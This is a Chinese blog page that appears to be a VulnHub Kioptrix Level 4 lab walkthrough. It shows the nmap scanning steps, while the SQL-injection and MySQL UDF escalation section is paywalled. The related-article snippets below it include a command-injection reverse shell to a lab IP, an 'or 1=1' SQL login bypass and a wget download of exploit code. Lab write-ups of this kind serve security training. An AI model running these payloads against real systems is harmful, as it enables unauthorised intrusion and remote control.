Vulnhub-Kioptrix Level 4 打靶

原创

已于 2024-12-10 19:58:20 修改 · 889 阅读

6 ·

CC 4.0 BY-SA版权

文章标签：

#服务器 #linux #网络安全 #系统安全 #web安全 #mysql

于 2024-12-10 19:45:20 首次发布

一、nmap扫描

二、sql万能密码，进入后台拿到密码登录ssh

三、MySQL UDF提权

四、补充

在靶机未打开和开启时分别arp-scan -l，判断那个IP为靶机IP，发现靶机IP为192.168.213.136

一、nmap扫描

#扫描tcp开放了那些端口，保存到ports中

nmap -sT --min-rate 10000 -p-192.168.213.136 -oA nmapscan/port

#扫描udp开放了那些端口，保存到udp中

nmap -sU --min-rate 10000 192.168.213.136 -oA nmapscan/udp

#对开放的端口进行详细的探测服务版本，保存到detail中

nmap -sT -sC -v -sV -O -Pn -p22,80,139,137,445 192.168.213.136 -oA nmapscan/detail

#使用nmap进行漏洞脚本探测

nmap --script=vuln -p22,80,111,139,443,1024 192.168.213.136 -oA nmapscan/vuln

总结:通过nmap扫描端口，得知了端口开放情况，端口服务的版本，和漏洞的情况

漏洞扫描在web中只扫到一个dos漏洞，并且139，445没有扫描到漏洞，22端口的ssh是打算往后考虑的，在80发现/database.sql 所以先看看web有什么突破口了。

二、sql万能密码，进入后台拿到密码登录ssh

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

a2FpX2tr

关注关注

30
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

VulnHub——Kioptrix Level 4

江左盟的博客

06-17

2221

简介该靶机较前面三个麻烦些，需要新建虚拟机，将虚拟磁盘导入。环境配置从官网下载压缩文件，解压后发现只有vmdk文件（虚拟磁盘文件），没有vmdx文件，因此需要新建虚拟机，选择自定义模式，安装来源选择“稍后安装”，然后在客户机操作系统选择“其他”，如图：然后选择位置为解压后放置vmdk文件的文件夹，名称自定义，如图：出现提示后点“继续”，设置内存为512M，如图：然后一路默认，在选择磁盘处选择“使用现有虚拟磁盘”，然后选择vmdk文件，如图：出现提示后选择“保持现

Vulnhub-Kioptrix Level 2 打靶

a2FpX2tr的博客

12-07

1918

现在功能正常了 nc监听并构造payload反弹shell：127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'nmap -sn 192.168.213.0/24 #在靶机打开时和未打开时使用这条命令，判断那个IP为靶机。apache 2.0.52有 dos漏洞，也探测出有csrf漏洞，没法getshell，放弃。是一个登录界面，先f12看一下，会不会泄露出是什么cms或发现其他的敏感信息。

参与评论您还未登录，请先登录后发表或查看评论

VulnHub靶机入门篇--Kioptrix4

2302_78903258的博客

07-28

1480

前面的知识点都跟之前题目差不多，后面出现了sql注入的利用，sqlmap工具的使用，以及获得webshell，在获得webshell之后的提权（数据库提权），以及一些linux的常用命令。

vulnhub-Kioptrix4靶机的测试报告

ccc_9wy的博客

10-22

885

基于渗透测试流程测试kioptrix4靶机；dirsearch目录扫描；sql注入；万能密码漏洞；UDF提权；mysql无密码登录；LinEnum.sh渗透测试报告。

Vulnhub-Kioptrix Level 3 打靶方法一

a2FpX2tr的博客

12-08

1487

arp-scan -l 主机发现，确定192.168.213.134为靶机。

vulnhub-Kioptrix2014靶场

shulao2010的博客

05-26

624

通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击

Vulnhub-Kioptrix Level 3 打靶方法二

a2FpX2tr的博客

12-09

466

Vulnhub-Kioptrix Level 3 打靶方法一-优快云博客。

Vulnhub Kioptrix Level 1打靶

a2FpX2tr的博客

12-06

559

searchsploit apache mod_ssl 发现能利用的exploit, 远程缓冲区溢出，能拿到shell。发现apache版本为1.3.20,打开网页使用Wappalyzer又发现mod_ssl 版本为2.8.4。在 http://github.com/heltonWernik/OpenLuck 找到编译利用的方法。在靶机上wget http://192.168.213.132:8888/ptrace-kmod.c。#对开放的端口进行详细的探测服务版本，保存到detail中。

Vulnhub-靶机-Kioptrix: Level 1.3 (#4)

qq_43264813的博客

02-02

609

Vulnhub—靶机—Kioptrix: Level 1.3 (#4) 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—Kioptrix: Level 1.3 (#4)一、信息收集二、漏洞利用三、Flag 一、信息收集【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描：【命令】n

Vulnhub系列-Kioptrix-Level-2

Yasso的博客

12-18

750

靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆，即存在sql注入二、0x00漏洞利用(sql注入) sqlmap跑一下数据登陆框抓包,因为sql注入在username处，在username处标记(减少测试时

【vulnhub——Kioptrix Level 1靶机】

jieli0901227的博客

05-26

847

找到samba 版本信息，通过https://www.exploit-db.com/ 漏洞利用库查找这个版本有个远程代码执行漏洞，我们试试。Kioptrix这个系列靶机默认是桥接模式，如果我们kali使用NAT是扫描不到靶机的，通过VM的靶机网络设置也不能更改成功。下载的文件解压后，编辑 Kioptix Level 1.vmx 文件，删除以 ethernet0开头的行，并保存，发现 MRTG 2.9.6 可能是个应用，搜索版本可能存在的漏洞，，没有可利用的信息。那么我们尝试这个版本漏洞搜索。

如何在CentOS 7.9服务器上配置并调优Docker Swarm集群，确保多容器管理与高效服务发现

最新发布

A5互联

01-05

631

在企业级微服务架构中，Docker Swarm作为Docker官方原生的集群编排解决方案，以其轻量、与Docker原生兼容等特点，仍在许多中小规模生产环境中获得采用。本文基于真实项目环境，从硬件架构、系统调优、Swarm集群搭建、网络/服务发现、安全配置与性能评估等方面，A5IDC提供一套在CentOS 7.9服务器上配置并调优Docker Swarm集群的技术方案。

【线程池 + Socket 服务器】

2401_86718044的博客

01-01

1236

通过线程池 + Socket 的组合，我们可以轻松构建高并发、可扩展的网络服务器。Flush 机制看似小细节，却直接影响数据是否及时、正确到达客户端。掌握自动与手动两种方式，就能应对从简单聊天到文件上传的各种场景。这两个示例代码都已经过完整测试，直接复制运行即可。欢迎在评论区分享你的实践经验，或者提出想看的进阶话题（如 NIO、非阻塞、HTTP 协议解析）

管家婆软件套接字服务器打不开怎么解决

herinspace的博客

12-30

421

在新的端口文件夹中，修改port值为新的端口号，修改好后重启套接字服务器。右键点击套接字服务器图标，选择属性，进入兼容性选项卡，勾选“以管理员身份运行”和“以兼容模式运行”。1，检查数据库权限：打开软件安装目录下的Data文件夹，找到对应账套的mdf和ldf文件，右键点击属性，设置Everyone用户的完全控制权限。4，检查杀毒软件：如果上述步骤无效，建议暂时禁用杀毒软件，然后重新启动套接字服务器。5，重装软件：如果问题仍未解决，建议备份数据后，关闭杀毒软件，换路径重装软件。

如何在Debian 11服务器上搭建并优化Elasticsearch集群，提升全局搜索引擎的吞吐量与精度

A5互联

01-05

850

通过上述步骤，在 Debian 11 上搭建了一个生产级 Elasticsearch 集群。A5数据从底层系统调优、JVM 参数、索引设计、查询优化、监控评估等多个层面做了详细讲解。结合硬件、配置与常见优化策略，可以为高吞吐量与高精度全局搜索引擎提供有力支撑。

当linux触发panic后进行自定义收尾回调处理

最后一个bug的博客

01-01

451

以上就是我的一些技巧和注意事项分享了。大家好，我是bug菌~

多内网服务器公网中转通信方案（Spring Boot 2.7 + MyBatis Plus）

weixin_42502300的博客

12-30

817

本文提出了一种基于公网中转服务器的内网通信方案，采用Spring Boot 2.7和MyBatis Plus实现。方案核心是通过公网服务器作为消息转发枢纽，连接多个内网客户端实现相互通信。主要特点包括：1）TCP Socket架构；2）内网客户端仅操作本地MySQL；3）支持自动重连、消息确认、心跳检测等机制；4）提供统一的消息格式和本地存储表结构。系统分为公网中转服务端和内网客户端两部分，服务端负责连接管理和消息转发，客户端通过本地数据库存储消息并实现业务处理。该方案适用于需要安全可靠的内网间通信场景。

时间同步校时服务器配件清单及挑选攻略校时时间服务器 网络时间同步装置

llilian_16的博客

01-04

909

不同应用场景（如企业网络、金融交易、工业自动化、电力电网等）对授时精度、可靠性、扩展性的需求差异较大，对应的配套设备选择也需精准匹配。挑选配套设备的核心逻辑是：先明确自身应用需求（精度、场景、规模），再按“基础必备→安全防护→扩展运维”的优先级逐层匹配，同时兼顾兼容性、可靠性与成本平衡。作用：卫星信号丢失时，为授时服务器提供备用时间基准，保障短期授时精度。核心环节优先保障：卫星天线、天馈线、供电模块是决定授时精度和稳定性的核心，需选择品牌可靠、参数达标的产品，避免因低成本配件导致信号衰减或设备故障。

断网服务器如何防“物理入侵”？用SLA 操作系统双因素认证实现离线双因子认证

安当加密

12-31

955

摘要：针对油田等离线环境中Windows服务器的安全风险，传统账号密码易被绕过。安当SLA方案通过深度集成Windows登录栈，实现完全离线的双因子认证：用户需同时输入密码并插入授权USB Key（支持国密算法），无需网络或域控支持。该方案覆盖本地/RDP登录，满足等保三级和密评要求，提供可审计的登录记录，有效防止物理接触式入侵。部署仅需注册DLL组件并配置策略文件，适用于工控、边防等无网场景，解决边缘资产“裸奔”问题。（149字）关键词：离线安全、双因子认证、USB Key、等保合规、无网环境

VulnHub Kioptrix Level 4 通过sqlmap --os shell提权的详细打靶过程及相应代码

10-26

VulnHub的Kioptrix Level 4是一个常见的渗透测试平台，它模拟了一个Linux服务器环境，挑战玩家通过一系列的安全漏洞进行系统级别的权限提升。在这个级别中，其中一个目标是利用SQL注入漏洞并使用`sqlmap`工具获取...